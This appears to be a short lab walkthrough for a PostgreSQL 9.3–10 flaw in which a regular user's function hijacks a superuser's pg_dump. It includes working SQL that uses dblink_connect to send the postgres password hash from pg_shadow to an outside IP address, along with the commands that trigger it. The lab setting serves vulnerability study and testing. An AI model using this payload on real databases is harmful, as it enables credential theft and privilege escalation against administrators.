PostgreSQL is a relational database. A logical error exists in versions 9.3 to 10, causing superusers to unknowingly trigger malicious code created by regular users, leading to the execution of some unexpected operations.
After starting the vulnerability environment, we first connect to the PostgreSQL database locally as the regular user vulhub:vulhub.
psql –host your-ip –username vulhub
After connecting to the database, execute the following statements.
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $
select dblink_connect((select 'hostaddr=47.240.75.183 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$ LANGUAGE SQL VOLATILE;
I listen on port 5433 on the VPS, waiting for the superuser to trigger this “backdoor” we left.
Simulate the root user on the target machine, and execute the pg_dump command as a superuser: docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub, exporting the contents of the vulhub database.
While executing the above command, the “backdoor” has been triggered, and the VPS machine has received sensitive information.